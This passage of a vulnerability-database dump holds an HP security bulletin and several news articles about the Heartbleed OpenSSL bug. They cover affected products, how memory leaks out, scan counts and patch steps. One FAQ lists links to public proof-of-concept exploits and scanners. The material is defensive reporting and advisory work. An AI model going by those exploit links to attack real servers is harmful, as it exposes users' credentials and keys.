as\r\nsoon as possible.\r\n\r\nRelease Date: 2014-04-30\r\nLast Updated: 2014-04-30\r\n\r\nPotential Security Impact: Remote disclosure of information\r\n\r\nSource: Hewlett-Packard Company, HP Software Security Response Team\r\n\r\nVULNERABILITY SUMMARY\r\nA potential security vulnerability has been identified with HP Insight\r\nControl software components running OpenSSL. This is the OpenSSL\r\nvulnerability known as "Heartbleed" which could be exploited remotely\r\nresulting in disclosure of information.\r\n\r\nNote: additional information regarding the OpenSSL "Heartbleed" vulnerability\r\nconcerning HP Servers products is available at the following HP Customer\r\nNotice:\r\n\r\nhttps://h20564.www2.hp.com/portal/site/hpsc/public/kb/docDisplay/?docId=emr_n\r\na-c04239413\r\n\r\nReferences: CVE-2014-0160, SSRT101550\r\n\r\nSUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.\r\nHP Insight Control impacted software component products and versions\r\n\r\nHP Systems Insight Manager v7.2, v7.2.1, v7.2.2, v7.3, and v7.3.1 bundled\r\nwith the following software:\r\n\r\nHP Smart Update Manager (SUM) v6.0.0 through v6.3.0\r\nHP System Management Homepage (SMH) v7.1.2, v7.2, v7.2.1, v7.2.2, v7.3,\r\nv7.3.1 for Linux and Windows\r\nWMI Mapper for HP Systems Insight Manager v7.2.1, v7.2.2, v7.3, and v7.3.1\r\nHP Version Control Agent (VCA) v7.2.0, v7.2.1, v7.2.2, v7.3.0, and v7.3.1 for\r\nWindows\r\nHP Version Control Agent (VCA) v7.2.2, v7.3.0, and v7.3.1 for Linux\r\nHP Version Control Repository Manager (VCRM) v7.2.0, v7.2.1, v7.2.2, v7.3.0,\r\nand v7.3.1 for Windows\r\n\r\nHP System Management Homepage (SMH) v7.1.2, v7.2, v7.2.1, v7.2.2, v7.3,\r\nv7.3.1 for Linux and Windows\r\n\r\nHP Insight Control server deployment v7.1.2, v7.2.0, v7.2.1, and v7.2.2\r\n\r\nBACKGROUND\r\n\r\nCVSS 2.0 Base Metrics\r\n===========================================================\r\n Reference Base Vector Base Score\r\nCVE-2014-0160 (AV:N/AC:L/Au:N/C:P/I:N/A:N) 5.0\r\n===========================================================\r\n Information on CVSS is documented\r\n in HP Customer Notice: HPSN-2008-002\r\n\r\nRESOLUTION\r\n\r\nHP has addressed this vulnerability for the impacted HP Insight Control\r\nsoftware components in the following HP Security Bulletins.\r\n\r\nHP Insight Control software components\r\n HP Security Bulletin\r\n Security Bulletin Location\r\n\r\nHP Systems Insight Manager (SIM)\r\n HPSBMU03022\r\n https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docDisplay/?docId=emr_\r\nna-c04263236\r\n\r\nHP Smart Update Manager (SUM)\r\n HPSBMU02997\r\n https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docDisplay/?docId=emr_\r\nna-c04239375\r\n\r\nHP System Management Homepage (SMH)\r\n HPSBMU02998\r\n https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docDisplay/?docId=emr_\r\nna-c04239372\r\n\r\nWMI Mapper for HP Systems Insight Manager\r\n HPSBMU03013\r\n https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docDisplay/?docId=emr_\r\nna-c04260385\r\n\r\nHP Version Control Agent (VCA) and Version Control Repository Manager (VCRM)\r\non Linux and Windows,\r\n HPSBMU03020\r\n https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docDisplay/?docId=emr_\r\nna-c04262472\r\n\r\nHP Insight Control server deployment\r\n HPSBMU03024\r\n https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docDisplay/?docId=emr_\r\nna-c04267749\r\n\r\nHISTORY\r\nVersion:1 (rev.1) - 30 April 2014 Initial release\r\n\r\nThird Party Security Patches: Third party security patches that are to be\r\ninstalled on systems running HP software products should be applied in\r\naccordance with the customer's patch management policy.\r\n\r\nSupport: For issues about implementing the recommendations of this Security\r\nBulletin, contact normal HP Services support channel. For other issues about\r\nthe content of this Security Bulletin, send e-mail to security-alert@hp.com.\r\n\r\nReport: To report a potential security vulnerability with any HP supported\r\nproduct, send Email to: security-alert@hp.com\r\n\r\nSubscribe: To initiate a subscription to receive future HP Security Bulletin\r\nalerts via Email:\r\nhttp://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins\r\n\r\nSecurity Bulletin Archive: A list of recently released Security Bulletins is\r\navailable here:\r\nhttps://h20564.www2.hp.com/portal/site/hpsc/public/kb/secBullArchive/\r\n\r\nSoftware Product Category: The Software Product Category is represented in\r\nthe title by the two characters following HPSB.\r\n\r\n3C = 3COM\r\n3P = 3rd Party Software\r\nGN = HP General Software\r\nHF = HP Hardware and Firmware\r\nMP = MPE/iX\r\nMU = Multi-Platform Software\r\nNS = NonStop Servers\r\nOV = OpenVMS\r\nPI = Printing and Imaging\r\nPV = ProCurve\r\nST = Storage Software\r\nTU = Tru64 UNIX\r\nUX = HP-UX\r\n\r\nCopyright 2014 Hewlett-Packard Development Company, L.P.\r\nHewlett-Packard Company shall not be liable for technical or editorial errors\r\nor omissions contained herein. The information provided is provided "as is"\r\nwithout warranty of any kind. To the extent permitted by law, neither HP or\r\nits affiliates, subcontractors or suppliers will be liable for\r\nincidental,special or consequential damages including downtime cost; lost\r\nprofits; damages relating to the procurement of substitute products or\r\nservices; or damages for loss of data, or software restoration. The\r\ninformation in this document is subject to change without notice.\r\nHewlett-Packard Company and the names of Hewlett-Packard products referenced\r\nherein are trademarks of Hewlett-Packard Company in the United States and\r\nother countries. Other product and company names mentioned herein may be\r\ntrademarks of their respective owners.\r\n\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v2.0.19 (GNU/Linux)\r\n\r\niEYEARECAAYFAlNhf8kACgkQ4B86/C0qfVnnpwCcD1emgbWP6dG//dmdLN5mR2Rw\r\nKH0AoLcaCs20x8N/G3V6N8e73UmvNcIl\r\n=E+N7\r\n-----END PGP SIGNATURE-----\r\n\r\n", "edition": 1, "cvss3": {}, "published": "2014-05-02T00:00:00", "title": "[security bulletin] HPSBMU03033 rev.1 - HP Insight Control Software Components running OpenSSL, Remote Disclosure of Information", "type": "securityvulns", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2014-0160"], "modified": "2014-05-02T00:00:00", "id": "SECURITYVULNS:DOC:30522", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:30522", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}], "thn": [{"lastseen": "2018-01-27T09:17:11", "description": "[](<https://4.bp.blogspot.com/-svp9PF6wRBU/U0zgP6p7T4I/AAAAAAAAbOU/05vHzW4cmI4/s1600/heartbleed.png>)\n\n_**Heartbleed**_ \u2013 I think now it\u2019s not a new name for you, as every informational website, Media and Security researchers are talking about probably the biggest Internet vulnerability in recent history. It is a critical bug in the OpenSSL's implementation of the TLS/DTLS heartbeat extension that allows attackers to read portions of the affected server\u2019s memory, potentially revealing users data, that the server did not intend to reveal.\n\n \n\n\nAfter the story broke online, websites around the world flooded with the heartbleed articles, explaining how it works, how to protect, and exactly what it is. Yet many didn\u2019t get it right. So based on the queries of Internet users, we answered some frequently asked questions about the bug.\n\n \n\n\n**1.) IS HEARTBLEED A VIRUS?**\n\nAbsolutely NO, It's not a virus. As described in our previous [article](<https://thehackernews.com/2014/04/how-heartbleed-bug-exposes-your.html>), The Heartbleed bug is a vulnerability resided in TLS heartbeat mechanism built into certain versions of the popular open source encryption standard OpenSSL, a popular version of the Transport Layer Security (TLS) protocol.\n\n \n\n\n**2.) HOW IT WORKS?**\n\nFor SSL to work, your computer needs to communicate to the server via sending '_**heartbeats**_' that keep informing the server that client (computer) is online (alive).\n\n \n\n\nHeartbleed attack allows an attacker to retrieve a block of memory of the server up to 64kb in response directly from the vulnerable server via sending the malicious heartbeat and there is no limit on the number of attacks that can be performed. [Technically Explained by Rahul Sasi on [Garage4hackers](<http://www.garage4hackers.com/entry.php?b=2551>)]\n\n \n\n\nIt opens doors for the cyber criminals to extract sensitive data directly from the server's memory without leaving any traces.\n\n[](<https://2.bp.blogspot.com/-0_DevhynabI/U0zUQQ-yUXI/AAAAAAAAbN8/UurRUbKnZbc/s1600/heartbleed_explanation.png>) \n--- \n_xkcd comic http://xkcd.com/1354/_ \n**3.) HEARTBLEED ATTACK RELIES ON MAN-IN-THE-MIDDLE ATTACK?**\n\nNo, it has nothing to deal with a Man-in-the-Middle (MitM) attack. But using Heartbleed attack, one can manage to obtain the private encryption key for an SSL/TLS certificate and could set up a fake website that passes the security verification.\n\n \n\n\nAn attacker could also decrypt the traffic passing between a client and a server i.e. Perfect man-in-the-middle attack on HTTPS connection.\n\n \n\n\n**4.) IS IT A CLIENT SIDE OR SERVER SIDE VULNERABILITY?**\n\nTLS heartbeats can be sent by either side of a TLS connection, so it can be used to attack clients as well as servers. An Attacker can obtain up to 64K memory from the server or client as well that uses an OpenSSL implementation vulnerable to Heartbleed (_CVE-2014-0160_).\n\n \n\n\nResearcher [estimated](<https://thehackernews.com/2014/04/heartbleed-openssl-zero-day-bug-leaves.html>) two-thirds of the world's servers i.e. half a million servers are affected by the Heartbleed Bug, including websites, email, and instant messaging services.\n\n \n**Video Explanation:** \n\n\n**5.) HOW HEARTBLEED AFFECTS SMARTPHONES?**\n\nSmartphone is the best practical example of Client side attacks.\n\n \n\n\nAll versions of Android OS include outdated versions of OpenSSL library, but only Android 4.1.1 Jelly Bean has the vulnerable heartbeat feature enabled by default. Blackberry also [confirmed](<https://thehackernews.com/2014/04/billions-of-smartphone-users-affected_13.html>) that some of its products are vulnerable to Heartbleed bug, whereas Apple's iOS devices are not affected by OpenSSL flaw.\n\n \n\n\nGoogle had patched the affected version Android 4.1.1, but it will take long time to deliver updated Android version to the end Smartphone users as updates to majority handsets are controlled by phone manufacturers and wireless carriers. Until users running the affected versions are vulnerable to the attacks, and hackers will definitely take advantage of this public disclosure.\n\n \n\n\n**6.) WHAT ELSE COULD BE VULNERABLE TO HEARTBLEED?**\n\nIP phones, Routers, Medical devices, Smart TV sets, embedded devices and millions of other devices that rely on the OpenSSL to provide secure communications could also be vulnerable to Heartbleed bug, as it is not expected for these devices to get the updates soon from Google\u2019s Android partners.\n\n \n\n\nYesterday, Industrial Control Systems-CERT also [warned](<http://ics-cert.us-cert.gov/alerts/ICS-ALERT-14-099-01B>) the critical infrastructure organizations (like energy, utilities or financial services companies) to beef-up their systems in order to defend against the Heartbleed attacks.\n\n \n\n\n**7.) WHO IS RESPONSIBLE FOR HEARTBLEED?**\n\nWe actually can't blame anyone developer, specially who are contributing to Open Source projects without money motivations. \n\n \n\n\nDr. Robin Seggelmann, a 31-year-old German developer who actually introduced the Heartbeat concept to OpenSSL on New Year's Eve, 2011, says it was just a programming error in the code that unintentionally created the \u201c_Heartbleed_\u201d vulnerability.\n\n \n\n\n\"_In one of the new features, unfortunately, I missed validating a variable containing a length_\", went undetected by the code reviewers and everyone else for over two years. He [claimed](<https://thehackernews.com/2014/04/german-developer-responsible-for.html>) '_I did so unintentionally_'.\n\n \n\n\n**8.) WHO HAS EXPLOITED THIS BUG YET?**\n\nBloomberg accused the National Security Agency (NSA) of knowing the Heartbleed bug for the last two years. Not even this, the report says the agency was using it continuously to gain information instead of disclosing it to the OpenSSL developers. But if it is so, then this would be one of the biggest developments in the history of wiretapping ever. However, the agency [denied](<https://thehackernews.com/2014/04/NSA-Heartbleed-Vulnerability-OpenSSL-Robin-Seggelmann.html>) it saying NSA was not aware of Heartbleed until it was made public.\n\n \n\n\nBut when it comes to exploit any known vulnerability, then Hackers are most likely to be top on the list. As the flaw was so widely spread that it affected half a million websites worldwide, so after the public disclosure, the cybercriminals could reach the sites to steal credentials, passwords and other data, before the site operators apply the freely available patch.\n\n \n\n\nThere are multiple Proof-of-concept exploits available for the Heartbleed flaw:\n\n * [Python Script](<https://gist.github.com/mpdavis/10171593>)\n * [Metasploit Module](<https://github.com/rapid7/metasploit-framework/pull/3206/files>)\n * [C Code](<https://github.com/HackerFantastic/Public/blob/master/exploits/heartbleed.c>)\n * [NMAP script](<https://github.com/sensepost/heartbleed-poc>)\n * [Python Script by Rahul Sasi](<https://bitbucket.org/fb1h2s/cve-2014-0160/src/2b1fff1a62e29397ff60586557c96989c7b64662/Heartbeat_scanner.py?at=master>)\n\n**9.) CHANGING ACCOUNT PASSWORDS CAN SOLVE THE ISSUE?**\n\nNot exactly, as Heartbleed attack has the ability to leak anything from the server including your passwords, credit card details or any kind of personal information. But, in order to protect your online accounts you should at least change your passwords immediately for the sites that resolved the issue and for the sites not affected by the bug as well, just to make sure that you are safe.\n\n \n\n\nFirst of all check if the sites you use every day on an individual basis are vulnerable to Heartbleed bug or not using following services or apps:, and if you're given a red flag, avoid the site for now.\n\n * [http://filippo.io/Heartbleed/](<https://filippo.io/Heartbleed/>)\n * [Provensec Scanner](<http://provensec.com/heartbleed/>)\n * [GlobalSign SSL Configuration Checker](<https://sslcheck.globalsign.com/>)\n * [ADTsys Checker](<http://seguranca.adtsys.com.br/>)\n * The easiest way to keep you safe is to use a new add-on to the Chrome browser, [Chromebleed](<https://chrome.google.com/webstore/detail/chromebleed/eeoekjnjgppnaegdjbcafdggilajhpic>), created by security researcher, Jamie Hoyle.\n * To check whether your Android devices are safe or not, you can install the [Bluebox Heartbleed Scanner](<https://play.google.com/store/apps/details?id=com.bblabs.heartbleedscanner>) available on the Google Play Store. The Bluebox Heartbleed Scanner looks for apps installed on your device that have bundled their own version of OpenSSL and the scanner also checks the version of the library and whether heartbeat is enabled or not.\n\nWell, nobody is sure at this point, because Heartbleed is stealthy as it leaves no traces behind and here the matter goes worse.\n\n \n\n\nYou may never know if you have been hacked using the flaw or not. This means that there is no way to tell if your information was stolen previously from a site or a service that has now fixed it.\n\n \n\n\nBut if you haven't change the password to the popular sites yet, then yes, your password and financial information are still widely open to cybercriminals and other spying agencies.\n\n \n\n\n**10.) WHAT SHOULD I DO TO PROTECT MYSELF?**\n\nFirst of all DON'T PANIC. You have to change your password everywhere, assuming that it was all vulnerable before, just to make sure that you are now safe. But hold on... If some sites are still affected by the flaw then your every effort is useless, as it\u2019s up to the site to first fix the vulnerability as soon as possible , because changing the password before the bug is fixed could compromise your new password as well. \n \nIf you own a vulnerable SSL Service, then you are recommended to: \n\n\n * Upgrade the OpenSSL version to [1.0.1g](<https://www.openssl.org/source/>)\n * Request revocation of the current SSL certificate\n * Regenerate your private key\n * Request and replace the SSL certificate\n\nDon't reuse any old passwords and it is good practice to use two-factor authentication, which means with the password, the account requires a freshly generated pass code that shows up only on your personal smartphone, before getting into certain sites. \n \nStay Safe! \n\n\n * [How Heartbleed Bug Exposes Your Passwords to Hackers](<https://thehackernews.com/2014/04/german-developer-responsible-for.html>)\n * [German Developer responsible for HeartBleed Bug in OpenSSL](<https://thehackernews.com/2014/04/german-developer-responsible-for.html>)\n * [How to Protect yourself from the 'Heartbleed' Bug](<https://thehackernews.com/2014/04/how-heartbleed-bug-exposes-your.html>)\n * [Heartbleed - OpenSSL Zero-day Bug leaves Millions of websites Vulnerable](<https://thehackernews.com/2014/04/heartbleed-openssl-zero-day-bug-leaves.html>)\n * [NSA denies Report that Agency knew and exploited Heartbleed Vulnerability](<https://thehackernews.com/2014/04/NSA-Heartbleed-Vulnerability-OpenSSL-Robin-Seggelmann.html>)\n", "cvss3": {}, "published": "2014-04-14T20:40:00", "type": "thn", "title": "HeartBleed Bug Explained - 10 Most Frequently Asked Questions", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2014-0160"], "modified": "2014-04-17T10:28:24", "id": "THN:244769C413FFA5BE647D8F6F93431B74", "href": "https://thehackernews.com/2014/04/heartbleed-bug-explained-10-most.html", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2018-01-27T09:18:03", "description": "[](<https://3.bp.blogspot.com/-eqXY6SQWOkQ/WIXZQiMLlTI/AAAAAAAArJA/-0BiAp9seZgDvkXXXuhbrQYOG1h5FpVtACLcB/s1600/heartbleed-openssl-vulnerability.png>)\n\nIt's more than two and half years since the discovery of the critical [OpenSSL Heartbleed vulnerability](<https://thehackernews.com/2014/04/hacker-exploits-heartbleed-bug-to.html>), but the flaw is still alive as it appears that many organizations did not remediate properly to the serious security glitch. \n \nIt was one of the biggest flaws in the Internet's history that affected the core security of as many as two-thirds of the world's servers i.e. half a million servers at the time of its discovery in April 2014. \n \nHowever, the critical bug still affects more than 199,500 systems even after 2 years and 9 months have already passed, according to a [new report](<https://www.shodan.io/report/DCPO7BkV?utm_campaign=news-alert&utm_medium=email&utm_source=app>) published today on Shodan, a search engine that scans for vulnerable devices. \n \n\n\n### Over 199,500 Systems Still Vulnerable to Heartbleed\n\n \n[Heartbleed](<https://thehackernews.com/2014/04/several-tor-exit-nodes-vulnerable-to.html>) (CVE-2014-0160) was a serious bug in the OpenSSL's implementation of the TLS/DTLS heartbeat extension that allowed [attackers to read portions](<https://thehackernews.com/2014/04/19-year-old-teenager-arrested-for_16.html>) of the affected server\u2019s memory, potentially revealing users data that the server isn't intended to reveal. \n \nAccording to Shodan CEO John Matherly, about 199,500 services remain exploitable by the Heartbleed vulnerability due to unpatched OpenSSL instances. \n \nThe countries most affected by Heartbleed still remain the United States, followed by Korea, China, Germany, France, Russian Federation, United Kingdom, India Brazil and Italy. \n \nMatherly discovered 42,032 heartbleed-exploitable services in the United States, 15,380 in Korea, 14,116 in China, and 14,072 services in Germany. \n \nWith top organizations vulnerable to the OpenSSL bug is SK Broadband and Amazon.com, and about 75,000 of the vulnerable services use expired SSL certificates and run Linux 3.x. \n \n[Heartbleed](<https://thehackernews.com/2014/04/heartbleed-bug-explained-10-most.html>) is one of many flaws that often exist unpatched in the wild, and now that the bug has been more than two and half years old and known to everybody, anyone can simply use it to carry out attacks against the still affected systems. \n \nAround 200,000 is really a troubling number, and one can imagine the danger and damages caused by the bug if exploited. \n \nSoftware bugs may come and go, but this flaw is more critical and probably the biggest Internet flaw in recent history as it left the contents of a server's memory, where the most sensitive data is stored, exposed to the attackers. \n \n\n\n### What are the Steps to Protect your Systems against Heartbleed?\n\n \nIt takes roughly three steps to remediate the Heartbleed bug. \n \n\n\n 1. **Patching**: Update your software to the latest versions of OpenSSL; thankfully almost all organization have accomplished this step.\n 2. **Creation of New Private Keys**: Creating new private keys will prevent an attacker, who already exploited the flaw before patching, from being able to spy on your encrypted.\n 3. **Reissuance of Security Certificates**: This step will eliminate the ability of any attacker to spoof organizations and fool or phish their customers.\n", "cvss3": {}, "published": "2017-01-22T23:27:00", "type": "thn", "title": "Over 199,500 Websites Are Still Vulnerable to Heartbleed OpenSSL Bug", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2014-0160"], "modified": "2017-01-23T10:35:46", "id": "THN:847F48AE6816E6BFF25355FC0EA7439A", "href": "https://thehackernews.com/2017/01/heartbleed-openssl-vulnerability.html", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2018-01-27T09:18:11", "description": "[](<https://1.bp.blogspot.com/-YQ3pfHXH8Vc/U0kTASBjW0I/AAAAAAAAbLs/0VNzJlaw61E/s1600/NSA-Heartbleed-vulnerability.jpg>)\n\nThe Bloomberg [claimed](<http://www.bloomberg.com/news/2014-04-11/nsa-said-to-have-used-heartbleed-bug-exposing-consumers.html>) that the U.S. National Security Agency (NSA) knew about the most critical Heartbleed flaw and has been using it on a regular basis to gather \u201c_critical intelligence_\u201d and sensitive information for at least past two years and decided to keep the bug secret, citing two sources \u2018_familiar with the matter_\u2019.\n\n \n\n\nIn response to the above report, NSA has issued a '_94 character'_ statement today denying the claims that it has known about the Heartbleed bug since two years and that it has been using it silently for the purpose of surveillance.\n\n \n\n\n\"_NSA was not aware of the recently identified Heartbleed vulnerability until it was made public_,\" the U.S. intelligence agency said on its [Twitter feed](<https://twitter.com/NSA_PAO/status/454720059156754434>).\n\n \n\n\n[Heartbleed](<https://thehackernews.com/2014/04/german-developer-responsible-for.html>) is one of the biggest Internet vulnerabilities in recent history that left large number of cryptographic keys and private data such as usernames, passwords, and credit card numbers, from the most important sites and services on the Internet open for hackers. \n\n \n\n\nThe bug resides in the \"_Heartbeat_\" feature of the most secured open source encryption protocol, OpenSSL, which is used by several social networks, search engines, banks and other websites to enable secure connections while transmitting data.\n\n \n\n\nA team of researchers from Codenomicon and Google Security researcher revealed the vulnerability this week that is in the wild since the new version 1.0.1f was released in March 2012. And just after the revelation, OpenSSL released the security Fix for the bug in its version 1.0.1g, but until then the Heartbleed bug made websites, email, instant messaging (IM), including some virtual private networks, on about half a million of the world's widely trusted web servers, open to hackers.\n\n \n\n\nThe birth of the most critical bug Heartbleed was due to a mistake done by a German programmer [Robin Seggelmann](<https://thehackernews.com/2014/04/german-developer-responsible-for.html>) over two years ago while working on a new Heartbeat feature in the OpenSSL.\n\n \n\n\nHe submitted the code of OpenSSL with the heartbeat feature in an update on New Year's Eve, 2011, and an \u201c_oversight_\u201d led to an error that unintentionally created the \u201c**Heartbleed**\u201d vulnerability.\n\n \n\n\nYesterday he said it could be entirely possible that the government intelligence agencies had been making use of this critical flaw over the past two years.\n\n \n\n\nThe fix was released just after, but the users\u2019 data are vulnerable until the vulnerable websites didn\u2019t implement it. You can only change your password immediately for those websites that are not affected, assuming that it was vulnerable before, just to make sure that you are now safe.\n\n \n\n\n**Related Important Articles:**\n\n * [How Heartbleed Bug Exposes Your Passwords to Hackers](<https://thehackernews.com/2014/04/german-developer-responsible-for.html>)\n * [German Developer responsible for HeartBleed Bug in OpenSSL](<https://thehackernews.com/2014/04/german-developer-responsible-for.html>)\n * [How to Protect yourself from the 'Heartbleed' Bug](<https://thehackernews.com/2014/04/how-heartbleed-bug-exposes-your.html>)\n * [Heartbleed - OpenSSL Zero-day Bug leaves Millions of websites Vulnerable](<https://thehackernews.com/2014/04/heartbleed-openssl-zero-day-bug-leaves.html>)\n", "cvss3": {}, "published": "2014-04-11T23:21:00", "type": "thn", "title": "NSA denies Report that Agency knew and exploited Heartbleed Vulnerability", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2014-0160"], "modified": "2014-04-12T10:21:51", "id": "THN:EBCB003D7DB7BD8BF73239F9718C6126", "href": "https://thehackernews.com/2014/04/NSA-Heartbleed-Vulnerability-OpenSSL-Robin-Seggelmann.html", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2018-01-27T09:18:11", "description": "[](<https://3.bp.blogspot.com/-PsXPunZKgEw/U0bcA1AOL-I/AAAAAAAAAL0/PLT1hx4fDZw/s1600/Heartbleed-bug-Exposes-Passwords.png>)\n\nAre you safe from the critical bug Heartbleed?? OpenSSL- the encryption technology used by millions of websites to encrypt the communication and is also used to protect our sensitive data such as e-mails, passwords or banking information. \n\n \n\n\nBut a tiny, but most critical flaw called \"[_Heartbleed_](<https://thehackernews.com/2014/04/heartbleed-openssl-zero-day-bug-leaves.html>)\" in the widely used OpenSSL opened doors for the cyber criminals to extract sensitive data from the system memory.\n\n** \n**\n\n**WHAT IS HEARTBLEED?**\n\nSSL and TLS are known to provide communication security and privacy over the Internet for applications such as websites, email, instant messaging (IM), including some virtual private networks (VPNs).\n\n \n\n\nHeartbleed is a critical bug (**[CVE-2014-0160](<https://thehackernews.com/2014/04/heartbleed-openssl-zero-day-bug-leaves.html>)**) is in the popular OpenSSL cryptographic software library, that actually resides in the OpenSSL's implementation of the TLS (transport layer security protocols) and DTLS (_Datagram TLS_) heartbeat extension (RFC6520).\n\n \n\n\nThis bug was independently discovered by a team of security engineers (Riku, Antti and Matti) at _Codenomicon_, while improving the SafeGuard feature in Codenomicon's Defensics security testing tools, and Neel Mehta of Google Security, who first reported it to the OpenSSL team.\n\n \n\n\nSoftware vulnerabilities may come and go, but this bug is more critical as it has left the large number of private keys and other secrets exposed to the Internet. The heartbleed bug can reveal the contents of a server's memory, where the most sensitive data is stored, including the private data such as usernames, passwords, and credit card numbers. \n\n \n\n\nThis could allow attackers to retrieve private keys and ultimately decrypt the server's encrypted traffic or even impersonate the server.\n\n> \u201c_The Heartbleed bug allows anyone on the Internet to read the memory of the systems protected by the vulnerable versions of the OpenSSL software. This compromises the secret keys used to identify the service providers and to encrypt the traffic, the names and passwords of the users and the actual content. This allows attackers to eavesdrop on communications, steal data directly from the services and users and to impersonate services and users_.\u201d\n\n**HEARTBLEED WORLDWIDE ****IMPACT**\n\nOpenSSL is most widely used cryptographic library for Apache and nginx Web servers, which handles a service of Transport Layer Security (TLS) called **Heartbeat**, an extension added to TLS in 2012. The combined market share of just those two, Apache and nginx, out of the active sites on the Internet is over 66% according to Netcraft's April 2014 Web Server Survey.\n\n \n\n\nMoreover, OpenSSL is used to protect email servers (SMTP, POP and IMAP protocols), chat servers (XMPP protocol), virtual private networks (SSL VPNs), network appliances and wide variety of client side software. Many large consumer sites are also saved by their conservative choice of SSL/TLS termination equipment and software. OpenSSL is also very popular in client software and somewhat popular in networked appliances which have most inertia in getting updates. \n \nSecurity researcher _'Robert Graham_' [scanned the Internet](<http://blog.erratasec.com/2014/04/600000-servers-vulnerable-to-heartbleed.html#.U0bKFfnlbGw>) and found that more than 600,000 servers are vulnerable to heartbleed flaw, including Yahoo.com, imgur.com, flickr.com, hidemyass.com. [[List](<https://github.com/musalbas/heartbleed-masstest/blob/master/top1000.txt>)]\n\n \n\n\nBecause of Heartbleed bug, the Canada Revenue Agency was forced to shut down its electronic tax collection service yesterday and apparently, World's biggest audio platform SoundCloud also logged out its users for fixing this flaw.\n\n[](<https://4.bp.blogspot.com/-ZjFqjwDfyfs/U0bGT6lMcEI/AAAAAAAAbIc/HdTKJsQUB3U/s1600/soundcloud.png>)\n\nYahoo, which has more than 800 million users around the world, also has been [exposed](<https://twitter.com/markloman/status/453502888447586304/photo/1>) by the bug. \n\n\n[](<https://1.bp.blogspot.com/-C1vFJyYZ5Ig/U0bIgPoTloI/AAAAAAAAbIo/EjLY1KOHb9w/s1600/yahoo-password-cracking.png>)\n\n** \n** **HOW HEARTBLEED WORKS?**\n\nIt is not a problem with the TLS/SSL technologies that encrypt the Internet, neither with how OpenSSL works. It is just a dumb coding mistake. \n \nUsing Heartbeats extension two computers make sure the other is still alive by sending data back and forth to each other. The client (user) sends its heartbeat to the server (website), and the server hands it right back. If by chance anyone of them goes down during the transaction, the other one will know using heartbeat sync mechanism. \n \nWhen that heartbeat is sent, a small amount of the server\u2019s short-term memory of about 64 kilobytes comes in reply from server and an attacker is supposed to grab it, that can leak sensitive data such as message contents, user credentials, session keys and server private keys. By sending heartbleed requests multiple times, an attacker is able to fetch more memory contents from the server.\n\n \n\n\nThis means, everything and anything in the memory such as SSL private keys, user keys used for your usernames and passwords, instant messages, emails and business critical documents and communication, and many more is vulnerable to cyber criminals. At this phase, you have to assume that it is all compromised. \n \nAbout two-thirds of web servers rely on OpenSSL, means the information passing through hundreds of thousands of websites could be vulnerable. \n \nSo far, Security experts have found no direct evidence that anyone has managed to use the bug to steal information. The vulnerability has been fixed in OpenSSL v1.0.1g. \n \nMajor websites, including Gmail and YouTube, Facebook, Tumblr, Yahoo and Dropbox have fixed the problem, but there are still thousands of websites who are yet to fix the problem. Users are advised to change their passwords on only those affected websites, that tell you they've fixed the problem. **[READ MORE](<https://thehackernews.com/2014/04/how-to-protect-yourself-from-heartbleed_10.html>) on how to protect yourself from Heartbleed bug**. \n \n**Related Important Articles:** \n \n \n \n \n\n\n * [German Developer responsible for HeartBleed Bug in OpenSSL](<https://thehackernews.com/2014/04/german-developer-responsible-for.html>)\n * [How Heartbleed Bug Exposes Your Passwords to Hackers](<https://thehackernews.com/2014/04/how-heartbleed-bug-exposes-your.html>)\n * [How to Protect yourself from the 'Heartbleed' Bug](<https://thehackernews.com/2014/04/how-heartbleed-bug-exposes-your.html>)\n * [Heartbleed - OpenSSL Zero-day Bug leaves Millions of websites Vulnerable](<https://thehackernews.com/2014/04/heartbleed-openssl-zero-day-bug-leaves.html>)\n", "cvss3": {}, "published": "2014-04-10T07:00:00", "type": "thn", "title": "How Heartbleed Bug Exposes Your Passwords to Hackers", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2014-0160"], "modified": "2014-04-12T09:00:54", "id": "THN:8D999AEE5218AD3BFA68E5ACE101F201", "href": "https://thehackernews.com/2014/04/how-heartbleed-bug-exposes-your.html", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2018-01-27T09:17:12", "description": "[](<https://4.bp.blogspot.com/-Q0TNjq7Fcx8/U0riot0TcrI/AAAAAAAAbMs/99nvaMv2pwQ/s1600/Android-blackberry-apple-iphone-heartbleed.jpg>)\n\n[Heartbleed](<https://thehackernews.com/search/label/Heartbleed%20bug>) has left a worst impression worldwide affecting millions of websites and is also supposed to put millions of Smartphones and tablets users at a great risk.\n\n \n\n\nHeartbleed is a critical bug (_[CVE-2014-0160](<https://thehackernews.com/2014/04/how-heartbleed-bug-exposes-your.html>)_) in the popular OpenSSL cryptographic software library, that actually resides in the OpenSSL's implementation of the TLS/DTLS heartbeat extension, which allows attackers to read portions of the affected server\u2019s memory, potentially revealing users data such as usernames, passwords, and credit card numbers, that the server did not intend to reveal.\n\n \n\n\n[OpenSSL](<https://thehackernews.com/search/label/OpenSSL>) is a widely-used cryptographic library which implements the SSL and TLS protocol and protects communications on the Internet, and mostly every websites use either SSL or TLS, even the Apache web server that powers almost half of the websites over internet utilizes OpenSSL.\n\n \n\n\nBut to assume that the users using desktop browsers to 